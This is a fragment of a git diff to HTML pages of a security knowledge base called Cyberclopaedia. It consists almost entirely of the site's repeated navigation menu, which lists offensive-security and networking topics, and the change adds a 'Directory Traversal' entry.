          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -197,22 +197,6 @@

The TCP/IP Su - - diff --git a/docs/Networking/VLANs.html b/docs/Networking/VLANs.html index 3fe404a2..e40cc0df 100644 --- a/docs/Networking/VLANs.html +++ b/docs/Networking/VLANs.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -202,22 +202,6 @@

Native VLAN

- - diff --git a/docs/Networking/index.html b/docs/Networking/index.html index a22daa50..e6e19d25 100644 --- a/docs/Networking/index.html +++ b/docs/Networking/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
